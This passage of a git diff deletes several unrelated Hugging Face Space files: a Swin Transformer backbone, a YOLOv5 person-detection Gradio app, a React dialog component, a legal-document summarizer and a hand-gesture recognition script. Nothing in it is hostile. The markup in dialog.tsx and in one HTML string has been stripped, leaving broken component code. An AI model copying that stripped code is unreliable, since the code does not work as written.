Stochastic depth rate. 
Default: 0.0 - act_layer (nn.Module, optional): Activation layer. Default: nn.GELU - norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm - """ - - def __init__( - self, - dim, - num_heads, - window_size=7, - shift_size=0, - mlp_ratio=4.0, - qkv_bias=True, - qk_scale=None, - drop=0.0, - attn_drop=0.0, - drop_path=0.0, - act_layer=nn.GELU, - norm_layer=nn.LayerNorm, - ): - super().__init__() - self.dim = dim - self.num_heads = num_heads - self.window_size = window_size - self.shift_size = shift_size - self.mlp_ratio = mlp_ratio - assert 0 <= self.shift_size < self.window_size, "shift_size must in 0-window_size" - - self.norm1 = norm_layer(dim) - self.attn = WindowAttention( - dim, - window_size=_to_2tuple(self.window_size), - num_heads=num_heads, - qkv_bias=qkv_bias, - qk_scale=qk_scale, - attn_drop=attn_drop, - proj_drop=drop, - ) - - if drop_path > 0.0: - from timm.models.layers import DropPath - - self.drop_path = DropPath(drop_path) - else: - self.drop_path = nn.Identity() - self.norm2 = norm_layer(dim) - mlp_hidden_dim = int(dim * mlp_ratio) - self.mlp = Mlp( - in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop - ) - - self.H = None - self.W = None - - def forward(self, x, mask_matrix): - """Forward function. - Args: - x: Input feature, tensor size (B, H*W, C). - H, W: Spatial resolution of the input feature. - mask_matrix: Attention mask for cyclic shift. - """ - B, L, C = x.shape - H, W = self.H, self.W - assert L == H * W, "input feature has wrong size" - - shortcut = x - x = self.norm1(x) - x = x.view(B, H, W, C) - - # pad feature maps to multiples of window size - pad_l = pad_t = 0 - pad_r = (self.window_size - W % self.window_size) % self.window_size - pad_b = (self.window_size - H % self.window_size) % self.window_size - x = F.pad(x, (0, 0, pad_l, pad_r, pad_t, pad_b)) - _, Hp, Wp, _ = x.shape - - # cyclic shift - if self.shift_size > 0: - shifted_x = torch.roll(x, shifts=(-self.shift_size, -self.shift_size), dims=(1, 2)) - attn_mask = mask_matrix - else: - shifted_x = x - attn_mask = None - - # partition windows - x_windows = window_partition( - shifted_x, self.window_size - ) # nW*B, window_size, window_size, C - x_windows = x_windows.view( - -1, self.window_size * self.window_size, C - ) # nW*B, window_size*window_size, C - - # W-MSA/SW-MSA - attn_windows = self.attn(x_windows, mask=attn_mask) # nW*B, window_size*window_size, C - - # merge windows - attn_windows = attn_windows.view(-1, self.window_size, self.window_size, C) - shifted_x = window_reverse(attn_windows, self.window_size, Hp, Wp) # B H' W' C - - # reverse cyclic shift - if self.shift_size > 0: - x = torch.roll(shifted_x, shifts=(self.shift_size, self.shift_size), dims=(1, 2)) - else: - x = shifted_x - - if pad_r > 0 or pad_b > 0: - x = x[:, :H, :W, :].contiguous() - - x = x.view(B, H * W, C) - - # FFN - x = shortcut + self.drop_path(x) - x = x + self.drop_path(self.mlp(self.norm2(x))) - - return x - - -class PatchMerging(nn.Module): - """Patch Merging Layer - Args: - dim (int): Number of input channels. - norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm - """ - - def __init__(self, dim, norm_layer=nn.LayerNorm): - super().__init__() - self.dim = dim - self.reduction = nn.Linear(4 * dim, 2 * dim, bias=False) - self.norm = norm_layer(4 * dim) - - def forward(self, x, H, W): - """Forward function. - Args: - x: Input feature, tensor size (B, H*W, C). - H, W: Spatial resolution of the input feature. 
- """ - B, L, C = x.shape - assert L == H * W, "input feature has wrong size" - - x = x.view(B, H, W, C) - - # padding - pad_input = (H % 2 == 1) or (W % 2 == 1) - if pad_input: - x = F.pad(x, (0, 0, 0, W % 2, 0, H % 2)) - - x0 = x[:, 0::2, 0::2, :] # B H/2 W/2 C - x1 = x[:, 1::2, 0::2, :] # B H/2 W/2 C - x2 = x[:, 0::2, 1::2, :] # B H/2 W/2 C - x3 = x[:, 1::2, 1::2, :] # B H/2 W/2 C - x = torch.cat([x0, x1, x2, x3], -1) # B H/2 W/2 4*C - x = x.view(B, -1, 4 * C) # B H/2*W/2 4*C - - x = self.norm(x) - x = self.reduction(x) - - return x - - -class BasicLayer(nn.Module): - """A basic Swin Transformer layer for one stage. - Args: - dim (int): Number of feature channels - depth (int): Depths of this stage. - num_heads (int): Number of attention head. - window_size (int): Local window size. Default: 7. - mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. Default: 4. - qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True - qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set. - drop (float, optional): Dropout rate. Default: 0.0 - attn_drop (float, optional): Attention dropout rate. Default: 0.0 - drop_path (float | tuple[float], optional): Stochastic depth rate. Default: 0.0 - norm_layer (nn.Module, optional): Normalization layer. Default: nn.LayerNorm - downsample (nn.Module | None, optional): Downsample layer at the end of the layer. - Default: None - use_checkpoint (bool): Whether to use checkpointing to save memory. Default: False. - """ - - def __init__( - self, - dim, - depth, - num_heads, - window_size=7, - mlp_ratio=4.0, - qkv_bias=True, - qk_scale=None, - drop=0.0, - attn_drop=0.0, - drop_path=0.0, - norm_layer=nn.LayerNorm, - downsample=None, - use_checkpoint=False, - ): - super().__init__() - self.window_size = window_size - self.shift_size = window_size // 2 - self.depth = depth - self.use_checkpoint = use_checkpoint - - # build blocks - self.blocks = nn.ModuleList( - [ - SwinTransformerBlock( - dim=dim, - num_heads=num_heads, - window_size=window_size, - shift_size=0 if (i % 2 == 0) else window_size // 2, - mlp_ratio=mlp_ratio, - qkv_bias=qkv_bias, - qk_scale=qk_scale, - drop=drop, - attn_drop=attn_drop, - drop_path=drop_path[i] if isinstance(drop_path, list) else drop_path, - norm_layer=norm_layer, - ) - for i in range(depth) - ] - ) - - # patch merging layer - if downsample is not None: - self.downsample = downsample(dim=dim, norm_layer=norm_layer) - else: - self.downsample = None - - def forward(self, x, H, W): - """Forward function. - Args: - x: Input feature, tensor size (B, H*W, C). - H, W: Spatial resolution of the input feature. 
- """ - - # calculate attention mask for SW-MSA - Hp = int(np.ceil(H / self.window_size)) * self.window_size - Wp = int(np.ceil(W / self.window_size)) * self.window_size - img_mask = torch.zeros((1, Hp, Wp, 1), device=x.device) # 1 Hp Wp 1 - h_slices = ( - slice(0, -self.window_size), - slice(-self.window_size, -self.shift_size), - slice(-self.shift_size, None), - ) - w_slices = ( - slice(0, -self.window_size), - slice(-self.window_size, -self.shift_size), - slice(-self.shift_size, None), - ) - cnt = 0 - for h in h_slices: - for w in w_slices: - img_mask[:, h, w, :] = cnt - cnt += 1 - - mask_windows = window_partition( - img_mask, self.window_size - ) # nW, window_size, window_size, 1 - mask_windows = mask_windows.view(-1, self.window_size * self.window_size) - attn_mask = mask_windows.unsqueeze(1) - mask_windows.unsqueeze(2) - attn_mask = attn_mask.masked_fill(attn_mask != 0, float(-100.0)).masked_fill( - attn_mask == 0, float(0.0) - ) - - for blk in self.blocks: - blk.H, blk.W = H, W - if self.use_checkpoint: - x = checkpoint.checkpoint(blk, x, attn_mask) - else: - x = blk(x, attn_mask) - if self.downsample is not None: - x_down = self.downsample(x, H, W) - Wh, Ww = (H + 1) // 2, (W + 1) // 2 - return x, H, W, x_down, Wh, Ww - else: - return x, H, W, x, H, W - - -class PatchEmbed(nn.Module): - """Image to Patch Embedding - Args: - patch_size (int): Patch token size. Default: 4. - in_chans (int): Number of input image channels. Default: 3. - embed_dim (int): Number of linear projection output channels. Default: 96. - norm_layer (nn.Module, optional): Normalization layer. Default: None - """ - - def __init__(self, patch_size=4, in_chans=3, embed_dim=96, norm_layer=None): - super().__init__() - patch_size = _to_2tuple(patch_size) - self.patch_size = patch_size - - self.in_chans = in_chans - self.embed_dim = embed_dim - - self.proj = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=patch_size) - if norm_layer is not None: - self.norm = norm_layer(embed_dim) - else: - self.norm = None - - def forward(self, x): - """Forward function.""" - # padding - _, _, H, W = x.size() - if W % self.patch_size[1] != 0: - x = F.pad(x, (0, self.patch_size[1] - W % self.patch_size[1])) - if H % self.patch_size[0] != 0: - x = F.pad(x, (0, 0, 0, self.patch_size[0] - H % self.patch_size[0])) - - x = self.proj(x) # B C Wh Ww - if self.norm is not None: - Wh, Ww = x.size(2), x.size(3) - x = x.flatten(2).transpose(1, 2) - x = self.norm(x) - x = x.transpose(1, 2).view(-1, self.embed_dim, Wh, Ww) - - return x - - -class SwinTransformer(Backbone): - """Swin Transformer backbone. - A PyTorch impl of : `Swin Transformer: Hierarchical Vision Transformer using Shifted - Windows` - https://arxiv.org/pdf/2103.14030 - Args: - pretrain_img_size (int): Input image size for training the pretrained model, - used in absolute postion embedding. Default 224. - patch_size (int | tuple(int)): Patch size. Default: 4. - in_chans (int): Number of input image channels. Default: 3. - embed_dim (int): Number of linear projection output channels. Default: 96. - depths (tuple[int]): Depths of each Swin Transformer stage. - num_heads (tuple[int]): Number of attention head of each stage. - window_size (int): Window size. Default: 7. - mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. Default: 4. - qkv_bias (bool): If True, add a learnable bias to query, key, value. Default: True - qk_scale (float): Override default qk scale of head_dim ** -0.5 if set. - drop_rate (float): Dropout rate. 
- attn_drop_rate (float): Attention dropout rate. Default: 0. - drop_path_rate (float): Stochastic depth rate. Default: 0.2. - norm_layer (nn.Module): Normalization layer. Default: nn.LayerNorm. - ape (bool): If True, add absolute position embedding to the patch embedding. Default: False. - patch_norm (bool): If True, add normalization after patch embedding. Default: True. - out_indices (Sequence[int]): Output from which stages. - frozen_stages (int): Stages to be frozen (stop grad and set eval mode). - -1 means not freezing any parameters. - use_checkpoint (bool): Whether to use checkpointing to save memory. Default: False. - """ - - def __init__( - self, - pretrain_img_size=224, - patch_size=4, - in_chans=3, - embed_dim=96, - depths=(2, 2, 6, 2), - num_heads=(3, 6, 12, 24), - window_size=7, - mlp_ratio=4.0, - qkv_bias=True, - qk_scale=None, - drop_rate=0.0, - attn_drop_rate=0.0, - drop_path_rate=0.2, - norm_layer=nn.LayerNorm, - ape=False, - patch_norm=True, - out_indices=(0, 1, 2, 3), - frozen_stages=-1, - use_checkpoint=False, - ): - super().__init__() - - self.pretrain_img_size = pretrain_img_size - self.num_layers = len(depths) - self.embed_dim = embed_dim - self.ape = ape - self.patch_norm = patch_norm - self.out_indices = out_indices - self.frozen_stages = frozen_stages - - # split image into non-overlapping patches - self.patch_embed = PatchEmbed( - patch_size=patch_size, - in_chans=in_chans, - embed_dim=embed_dim, - norm_layer=norm_layer if self.patch_norm else None, - ) - - # absolute position embedding - if self.ape: - pretrain_img_size = _to_2tuple(pretrain_img_size) - patch_size = _to_2tuple(patch_size) - patches_resolution = [ - pretrain_img_size[0] // patch_size[0], - pretrain_img_size[1] // patch_size[1], - ] - - self.absolute_pos_embed = nn.Parameter( - torch.zeros(1, embed_dim, patches_resolution[0], patches_resolution[1]) - ) - nn.init.trunc_normal_(self.absolute_pos_embed, std=0.02) - - self.pos_drop = nn.Dropout(p=drop_rate) - - # stochastic depth - dpr = [ - x.item() for x in torch.linspace(0, drop_path_rate, sum(depths)) - ] # stochastic depth decay rule - - # build layers - self.layers = nn.ModuleList() - for i_layer in range(self.num_layers): - layer = BasicLayer( - dim=int(embed_dim * 2**i_layer), - depth=depths[i_layer], - num_heads=num_heads[i_layer], - window_size=window_size, - mlp_ratio=mlp_ratio, - qkv_bias=qkv_bias, - qk_scale=qk_scale, - drop=drop_rate, - attn_drop=attn_drop_rate, - drop_path=dpr[sum(depths[:i_layer]) : sum(depths[: i_layer + 1])], - norm_layer=norm_layer, - downsample=PatchMerging if (i_layer < self.num_layers - 1) else None, - use_checkpoint=use_checkpoint, - ) - self.layers.append(layer) - - num_features = [int(embed_dim * 2**i) for i in range(self.num_layers)] - self.num_features = num_features - - # add a norm layer for each output - for i_layer in out_indices: - layer = norm_layer(num_features[i_layer]) - layer_name = f"norm{i_layer}" - self.add_module(layer_name, layer) - - self._freeze_stages() - self._out_features = ["p{}".format(i) for i in self.out_indices] - self._out_feature_channels = { - "p{}".format(i): self.embed_dim * 2**i for i in self.out_indices - } - self._out_feature_strides = {"p{}".format(i): 2 ** (i + 2) for i in self.out_indices} - self._size_devisibility = 32 - - self.apply(self._init_weights) - - def _freeze_stages(self): - if self.frozen_stages >= 0: - self.patch_embed.eval() - for param in self.patch_embed.parameters(): - param.requires_grad = False - - if self.frozen_stages >= 1 and self.ape: - 
self.absolute_pos_embed.requires_grad = False - - if self.frozen_stages >= 2: - self.pos_drop.eval() - for i in range(0, self.frozen_stages - 1): - m = self.layers[i] - m.eval() - for param in m.parameters(): - param.requires_grad = False - - def _init_weights(self, m): - if isinstance(m, nn.Linear): - nn.init.trunc_normal_(m.weight, std=0.02) - if isinstance(m, nn.Linear) and m.bias is not None: - nn.init.constant_(m.bias, 0) - elif isinstance(m, nn.LayerNorm): - nn.init.constant_(m.bias, 0) - nn.init.constant_(m.weight, 1.0) - - @property - def size_divisibility(self): - return self._size_divisibility - - def forward(self, x): - """Forward function.""" - x = self.patch_embed(x) - - Wh, Ww = x.size(2), x.size(3) - if self.ape: - # interpolate the position embedding to the corresponding size - absolute_pos_embed = F.interpolate( - self.absolute_pos_embed, size=(Wh, Ww), mode="bicubic" - ) - x = (x + absolute_pos_embed).flatten(2).transpose(1, 2) # B Wh*Ww C - else: - x = x.flatten(2).transpose(1, 2) - x = self.pos_drop(x) - - outs = {} - for i in range(self.num_layers): - layer = self.layers[i] - x_out, H, W, x, Wh, Ww = layer(x, Wh, Ww) - - if i in self.out_indices: - norm_layer = getattr(self, f"norm{i}") - x_out = norm_layer(x_out) - - out = x_out.view(-1, H, W, self.num_features[i]).permute(0, 3, 1, 2).contiguous() - outs["p{}".format(i)] = out - - return outs diff --git a/spaces/coutant/yolo-person/app.py b/spaces/coutant/yolo-person/app.py deleted file mode 100644 index 9c73a3b76b0b984a8b0f8326da7f8e95ea074742..0000000000000000000000000000000000000000 --- a/spaces/coutant/yolo-person/app.py +++ /dev/null @@ -1,32 +0,0 @@ -from typing import List -import PIL.Image -import torch -import gradio as gr - -article = "

      Github Repo

      " - -model = torch.hub.load('ultralytics/yolov5', 'yolov5l') -model.classes = [ 0 ] # only considering class 'person' and not the 79 other classes... -model.conf = 0.6 # only considering detection above the threshold. - -def inference(img:PIL.Image.Image, threshold:float=0.6): - if img is None: - return None,0 - images:List[PIL.Image.Image] = [ img ] # inference operates on a list of images - model.conf = threshold - detections = model(images, size=640) - predictions:torch.Tensor = detections.pred[0] # the predictions for our single image - result_image = detections.ims[0] if hasattr(detections, "ims") else detections.imgs[0] # either model.common.Detections or torchvision.Detections - detections.render() # bounding boxes and labels added into image - return result_image, predictions.size(dim=0) # image and number of detections - -gr.Interface( - fn = inference, - inputs = [ gr.Image(type="pil", label="Input"), gr.Slider(minimum=0.5, maximum=0.9, step=0.05, value=0.7, label="Confidence threshold") ], - outputs = [ gr.Image(type="pil", label="Output"), gr.Label(label="nb of persons detected for given confidence threshold") ], - title="Person detection with YOLO v5", - description="Person detection, you can twik the corresponding confidence threshold. Good results even when face not visible.", - article=article, - examples=[['data/businessmen-612.jpg'], ['data/businessmen-back.jpg']], - allow_flagging="never" -).launch(debug=True, enable_queue=True) \ No newline at end of file diff --git a/spaces/cozyanduofen/bingo/src/components/ui/dialog.tsx b/spaces/cozyanduofen/bingo/src/components/ui/dialog.tsx deleted file mode 100644 index 925e77fe7858fb218b5115b4e225174a886e0f02..0000000000000000000000000000000000000000 --- a/spaces/cozyanduofen/bingo/src/components/ui/dialog.tsx +++ /dev/null @@ -1,128 +0,0 @@ -'use client' - -import * as React from 'react' -import * as DialogPrimitive from '@radix-ui/react-dialog' - -import { cn } from '@/lib/utils' -import { IconClose } from '@/components/ui/icons' - -const Dialog = DialogPrimitive.Root - -const DialogTrigger = DialogPrimitive.Trigger - -const DialogPortal = ({ - className, - children, - ...props -}: DialogPrimitive.DialogPortalProps) => ( - -
      - {children} -
      -
      -) -DialogPortal.displayName = DialogPrimitive.Portal.displayName - -const DialogOverlay = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -DialogOverlay.displayName = DialogPrimitive.Overlay.displayName - -const DialogContent = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, ...props }, ref) => ( - - - - {children} - - - Close - - - -)) -DialogContent.displayName = DialogPrimitive.Content.displayName - -const DialogHeader = ({ - className, - ...props -}: React.HTMLAttributes) => ( -
      -) -DialogHeader.displayName = 'DialogHeader' - -const DialogFooter = ({ - className, - ...props -}: React.HTMLAttributes) => ( -
      -) -DialogFooter.displayName = 'DialogFooter' - -const DialogTitle = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -DialogTitle.displayName = DialogPrimitive.Title.displayName - -const DialogDescription = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -DialogDescription.displayName = DialogPrimitive.Description.displayName - -export { - Dialog, - DialogTrigger, - DialogContent, - DialogHeader, - DialogFooter, - DialogTitle, - DialogDescription -} diff --git a/spaces/d0r1h/LegSum/Summarizer/Extractive.py b/spaces/d0r1h/LegSum/Summarizer/Extractive.py deleted file mode 100644 index c6e3f76284527674a257c598ab24e964a90ac760..0000000000000000000000000000000000000000 --- a/spaces/d0r1h/LegSum/Summarizer/Extractive.py +++ /dev/null @@ -1,95 +0,0 @@ -import nltk -import torch -from summarizer import Summarizer -from sumy.nlp.tokenizers import Tokenizer -from sumy.summarizers.lsa import LsaSummarizer -from sumy.parsers.plaintext import PlaintextParser -from sumy.summarizers.lex_rank import LexRankSummarizer -from sumy.summarizers.sum_basic import SumBasicSummarizer -from transformers import AutoTokenizer, AutoModelForSeq2SeqLM - -nltk.download('punkt') - -def extractive(method, file): - sumarizer = method - sentences_ = [] - doc_ = PlaintextParser(file, Tokenizer("en")).document - for sentence in sumarizer(doc_, 5): - sentences_.append(str(sentence)) - summm_ = " ".join(sentences_) - return summm_ - -def summarize(file, model): - - with open(file.name) as f: - doc = f.read() - - if model == "Pegasus": - checkpoint = "google/pegasus-billsum" - tokenizer = AutoTokenizer.from_pretrained(checkpoint) - model = AutoModelForSeq2SeqLM.from_pretrained(checkpoint) - inputs = tokenizer(doc, - max_length=1024, - truncation=True, - return_tensors="pt") - - summary_ids = model.generate(inputs["input_ids"]) - summary = tokenizer.batch_decode(summary_ids, - skip_special_tokens=True, - clean_up_tokenization_spaces=False) - summary = summary[0] - elif model == "LEDBill": - tokenizer = AutoTokenizer.from_pretrained("d0r1h/LEDBill") - model = AutoModelForSeq2SeqLM.from_pretrained("d0r1h/LEDBill", return_dict_in_generate=True) - - input_ids = tokenizer(doc, return_tensors="pt").input_ids - global_attention_mask = torch.zeros_like(input_ids) - global_attention_mask[:, 0] = 1 - - sequences = model.generate(input_ids, global_attention_mask=global_attention_mask).sequences - summary = tokenizer.batch_decode(sequences, skip_special_tokens=True) - - summary = summary[0] - - elif model == "ILC": - tokenizer = AutoTokenizer.from_pretrained("d0r1h/led-base-ilc") - model = AutoModelForSeq2SeqLM.from_pretrained("d0r1h/led-base-ilc", return_dict_in_generate=True) - - input_ids = tokenizer(doc, return_tensors="pt").input_ids - global_attention_mask = torch.zeros_like(input_ids) - global_attention_mask[:, 0] = 1 - - sequences = model.generate(input_ids, global_attention_mask=global_attention_mask).sequences - summary = tokenizer.batch_decode(sequences, skip_special_tokens=True) - - summary = summary[0] - elif model == "Distill": - checkpoint = "sshleifer/distill-pegasus-cnn-16-4" - tokenizer = AutoTokenizer.from_pretrained(checkpoint) - model = AutoModelForSeq2SeqLM.from_pretrained(checkpoint) - inputs = tokenizer(doc, - max_length=1024, - truncation=True, - return_tensors="pt") - - summary_ids = model.generate(inputs["input_ids"]) - summary = tokenizer.batch_decode(summary_ids, - 
skip_special_tokens=True, - clean_up_tokenization_spaces=False) - summary = summary[0] - - elif model == "TextRank": - summary = extractive(LexRankSummarizer(), doc) - - elif model == "SumBasic": - summary = extractive(SumBasicSummarizer(), doc) - - elif model == "Lsa": - summary = extractive(LsaSummarizer(), doc) - - elif model == "BERT": - modelbert = Summarizer('distilbert-base-uncased', hidden=[-1,-2], hidden_concat=True) - result = modelbert(doc) - summary = ''.join(result) - - return summary \ No newline at end of file diff --git a/spaces/dandan4272/hand_gesture_rec/predict_st_gcn.py b/spaces/dandan4272/hand_gesture_rec/predict_st_gcn.py deleted file mode 100644 index ca38f95e79c28f3b0425abf32a5ae6e2e4b75a66..0000000000000000000000000000000000000000 --- a/spaces/dandan4272/hand_gesture_rec/predict_st_gcn.py +++ /dev/null @@ -1,800 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- -import csv -import copy -import argparse -import gc -import itertools -import os -import time - -import cv2 -from PIL import Image -from torch.nn import functional as F - -import cv2 as cv -import numpy as np -import mediapipe as mp -import torch - -from model.stgcn import TwoStreamSpatialTemporalGraph, normalize_points_with_size, scale_pose -# from main import ACTION_MODEL_MAX_FRAMES -from model.stgcn.stgcn import STGCN - - -def prepocess(pts, image_size): - """Predict actions from single person skeleton points and score in time sequence. - Args: - pts: (numpy array) points and score in shape `(t, v, c)` where - t : inputs sequence (time steps)., - v : number of graph node (body parts)., - c : channel (x, y, score)., - image_size: (tuple of int) width, height of image frame. - Returns: - (numpy array) Probability of each class actions. - """ - pts[:, :, :2] = normalize_points_with_size(pts[:, :, :2], image_size[0], image_size[1]) - pts[:, :, :2] = scale_pose(pts[:, :, :2]) - # pts = np.concatenate((pts, np.expand_dims((pts[:, 1, :] + pts[:, 2, :]) / 2, 1)), axis=1) - # - # pts = torch.tensor(pts, dtype=torch.float32) - # pts = pts.permute(2, 0, 1)[None, :] - # - # mot = pts[:, :2, 1:, :] - pts[:, :2, :-1, :] - # mot = mot.to(self.device) - # pts = pts.to(self.device) - - # out = self.model((pts, mot)) - - # return out.detach().cpu().numpy() - return pts - - -def get_args(): - parser = argparse.ArgumentParser() - - parser.add_argument("--device", type=int, default=0) - parser.add_argument("--width", help='cap width', type=int, default=640) - parser.add_argument("--height", help='cap height', type=int, default=480) - - parser.add_argument('--use_static_image_mode', action='store_true') - parser.add_argument("--min_detection_confidence", - help='min_detection_confidence', - type=float, - default=0.7) - parser.add_argument("--min_tracking_confidence", - help='min_tracking_confidence', - type=int, - default=0.5) - parser.add_argument("--action_frames", - help='action_frames', - type=int, - default=15) - args = parser.parse_args() - - return args - - - - -def prob_viz(res, actions, input_frame, colors): - output_frame = input_frame.copy() - for num, prob in enumerate(res): - # cv2.rectangle(output_frame, (0, 60 + num * 40), (int(prob * 100), 90 + num * 40), colors[num], -1) - cv.putText(output_frame, actions[num], (0, 85 + num * 40), cv.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, - cv.LINE_AA) - return output_frame - - -def predict(input, model, device): - model.to(device) - with torch.no_grad(): - input1,input2 = input - input1=input1.to(device) - input2=input2.to(device) - - # out = model(input1,input2) 
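# --- Editor's aside (illustration, not part of the original diff): a self-contained sketch of the
# tensor layout suggested by the commented-out lines in prepocess() above, where the two-stream
# ST-GCN consumes a joint stream and a frame-difference motion stream. Shapes are assumptions
# based on that code: (T, V, C) keypoints with T frames, V = 21 hand joints, C = 3 (x, y, score).
import numpy as np
import torch

T, V, C = 15, 21, 3
pts_demo = np.random.rand(T, V, C).astype(np.float32)    # stand-in for normalized keypoints

x = torch.from_numpy(pts_demo).permute(2, 0, 1)[None]    # -> (1, C, T, V), the joint stream
mot = x[:, :2, 1:, :] - x[:, :2, :-1, :]                 # frame-to-frame motion stream, (1, 2, T-1, V)
print(x.shape, mot.shape)                                 # torch.Size([1, 3, 15, 21]) torch.Size([1, 2, 14, 21])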
- out = model(input1) - - out = torch.squeeze(out) - out = F.softmax(out) - _, pre = torch.max(out.data, 0) - # out_prop = out[pre.item()-1] - # return pre.item() - return out.cpu().numpy(),pre.item() - - -# def det_image(): -# # 引数解析 ################################################################# -# args = get_args() -# ACTION_MODEL_MAX_FRAMES = 15 -# -# load_iters = 3000 # 加载之前训练的模型(指定迭代次数) -# device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") -# -# threshold = 0.996 -# graph_args = {'strategy': 'spatial'} -# -# model = TwoStreamSpatialTemporalGraph(graph_args, 10) -# model.eval() -# pre = torch.load('weights/data_aug2/_hand_stgcn_fps15_21node_sgd_40.pth') -# model.load_state_dict(pre, False) -# model = torch.nn.DataParallel(model).cuda() -# -# cap_device = args.device -# cap_width = args.width -# cap_height = args.height -# -# use_static_image_mode = args.use_static_image_mode -# min_detection_confidence = args.min_detection_confidence -# min_tracking_confidence = args.min_tracking_confidence -# -# use_brect = True -# joints_list = [] -# # 读取视频 ############################################################### -# video_path = 'datasets/test_video/test2.mp4' -# cap = cv.VideoCapture(0) -# cap.set(cv.CAP_PROP_FRAME_WIDTH, cap_width) -# cap.set(cv.CAP_PROP_FRAME_HEIGHT, cap_height) -# -# # モデルロード ############################################################# -# mp_hands = mp.solutions.hands -# # print(mp_hands.Hands_CONNECTIONS) -# -# hands = mp_hands.Hands( -# static_image_mode=use_static_image_mode, -# max_num_hands=1, -# min_detection_confidence=min_detection_confidence, -# min_tracking_confidence=min_tracking_confidence, -# ) -# -# actions = np.array( -# ['shake_hand', 'palm', 'fist', 'clock_wise', 'anti_clockwise', 'ok', 'thumb', 'v', 'heart', 'no_gesture']) -# -# point_history = [] -# x = np.zeros((21, 2)) -# point_history.append(x) -# action_name = 'no_gesture' -# index_frame = 0 -# times = 0 -# while True: -# -# # 读取视频/图像 ##################################################### -# ret, image = cap.read() -# if not ret: -# break -# image = cv.flip(image, 1) # 镜像 -# image = cv.resize(image, (640, 480)) -# debug_image = copy.deepcopy(image) -# -# # ############################################################# -# image = cv.cvtColor(image, cv.COLOR_BGR2RGB) -# -# image.flags.writeable = False -# results = hands.process(image) -# image.flags.writeable = True -# index_frame += 1 -# # #################################################################### -# if results.multi_hand_landmarks is not None: -# times += 1 -# -# for hand_landmarks, handedness in zip(results.multi_hand_landmarks, -# results.multi_handedness): -# -# # 外接矩形計算 -# brect = calc_bounding_rect(debug_image, hand_landmarks) -# # 关键点计算 -# landmark_list, joints = calc_landmark_list(debug_image, hand_landmarks) -# # if index_frame %3 == 0: -# joints_list.append(np.array(joints)) -# -# # 描画 -# debug_image = draw_bounding_rect(use_brect, debug_image, brect) -# debug_image = draw_landmarks(debug_image, landmark_list) -# -# if len(joints_list) == ACTION_MODEL_MAX_FRAMES: -# pts = np.array(joints_list, dtype=np.float32) -# pts = prepocess(pts, (640, 480)) -# pts = torch.from_numpy(pts) -# pts = torch.unsqueeze(pts, dim=0) -# out = model(pts) -# -# out = F.softmax(out) -# -# index = out[0].argmax() -# action_name1 = actions[index] -# action = '{}: {:.2f}%'.format(action_name, out[0].max() * 100) -# joints_list = [] -# print(action) -# if out[0].max() > threshold: -# action_name1 = action_name1 -# else: -# action_name1 
= 'no_gesture' -# -# if action_name != action_name1: -# # times += 1 -# # ACTION_MODEL_MAX_FRAMES = 15 -# action_name = action_name1 -# # break -# # action_name ='no_gesture' -# else: -# # ACTION_MODEL_MAX_FRAMES = 15 -# # times -= 1 -# action_name = action_name1 -# -# elif len(joints_list) == 0: -# action_name = 'no_gesture' -# -# # 画面反映 ############################################################# -# cv.putText(debug_image, ' '.join(action_name), (3, 30), -# cv.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv.LINE_AA) -# cv.imshow('Hand Gesture Recognition', debug_image) -# # 处理(ESC:关闭) ################################################# -# key = cv.waitKey(1) -# if key == 27: # ESC -# break -# cap.release() -# cv.destroyAllWindows() - - -def det_image(video_path): - - - graph_args = {'strategy': 'spatial'} - - model = TwoStreamSpatialTemporalGraph(graph_args, 10) - model.eval() - pre = torch.load('./weights/_hand_stgcn_fps15_21node_sgd_40.pth',map_location=torch.device('cpu')) - model.load_state_dict(pre, False) - - if video_path is None or video_path == "": - # 判断是否有图片存在 - print("视频不存在!") - return None, None, None - args = get_args() - threshold = 0.98 - - # 引数解析 ################################################################# - cap_device = args.device - cap_width = args.width - cap_height = args.height - ACTION_MODEL_MAX_FRAMES = args.action_frames - use_static_image_mode = args.use_static_image_mode - min_detection_confidence = args.min_detection_confidence - min_tracking_confidence = args.min_tracking_confidence - - use_brect = True - joints_list = [] - # 读取视频 ############################################################### - - gc.collect() - output_video_path = "./output.mp4" - - cap = cv2.VideoCapture(video_path) - fourcc = cv.VideoWriter_fourcc('m', 'p', '4', 'v') - frame = cv.VideoWriter(output_video_path, fourcc, 30.0, (640, 480)) - - # cap = cv2.VideoCapture(video_path) - # fourcc = cv2.VideoWriter_fourcc(*"I420") # 编码器 - - # frame = cv2.VideoWriter(output_video_path, fourcc, 30.0, (int(cap.get(3)), int(cap.get(4)))) - - - # cap = cv.VideoCapture(video_path) - cap.set(cv.CAP_PROP_FRAME_WIDTH, cap_width) - cap.set(cv.CAP_PROP_FRAME_HEIGHT, cap_height) - - # モデルロード ############################################################# - mp_hands = mp.solutions.hands - - hands = mp_hands.Hands( - static_image_mode=use_static_image_mode, - max_num_hands=1, - min_detection_confidence=min_detection_confidence, - min_tracking_confidence=min_tracking_confidence, - ) - - actions = np.array( - ['shake_hand', 'palm', 'fist', 'clock_wise', 'anti_clockwise', 'ok', 'thumb', 'v', 'heart', 'no_gesture']) - - point_history = [] - x = np.zeros((21, 2)) - point_history.append(x) - action_name = 'no_gesture' - index_frame = 0 - times = 0 - - os.system(""" - if [ -e '.output.mp4' ]; then - rm .output.mp4 - fi - """) - fps = 0.0 - - if cap.isOpened(): - while cap.isOpened(): - t1 = time.time() - - # 读取视频/图像 ##################################################### - ret, image = cap.read() - if not ret: - break - # image = cv.flip(image, 1) # 镜像 - image = cv.resize(image, (640, 480)) - debug_image = copy.deepcopy(image) - - 